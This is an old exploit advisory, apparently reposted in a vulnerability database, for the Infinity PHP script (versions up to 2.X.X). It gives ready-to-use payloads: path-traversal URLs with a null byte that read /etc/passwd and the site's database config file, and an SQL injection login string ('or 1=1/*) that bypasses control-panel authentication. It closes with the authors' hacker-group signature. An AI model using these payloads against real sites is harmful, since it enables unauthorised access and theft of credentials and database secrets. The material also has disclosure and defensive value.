Infinity <= v2.X.X (Local File Disclosure/Auth Bypass) Vulnerabilities

2009-08-25T00:00:00
ID SECURITYVULNS:DOC:22370
Type securityvulns
Reporter Securityvulns
Modified 2009-08-25T00:00:00

Description

-----------------Infinity <= v2.X.X (Local File Disclosure/Auth Bypass) Vulnerabilities------------------------- Script : Infinity version : 2.X.X Language: PHP Site: http://www.dimofinf.net/ Author: SwEET-DeViL

need magic_quotes_gpc = Off <-----(<>


  • +[Local File Disclosure]

Exploit:

http://WWW.Site.Com/inf/?options[langfile]=../../../../../../etc/passwd%00

http://WWW.Site.Com/inf/?options[style_dir]=../include/db.php%00

----------------------------------------------------------------------------------------------------------------

  • +[Auth Bypass]

http://WWW.Site.Com/inf/cp

Exploit:

username : 'or 1=1/*

password : SwEET-DeViL

----------------------------------------------------------------------------------------------------------------

/-------------www.arab4services.net-----------------\ |+------------------------------------------------+ | || SwEET-DeViL & viP HaCkEr | | || gamr-14(at)hotmail.com | | |+------------------------------------------------+ | \---------------------------------------------------/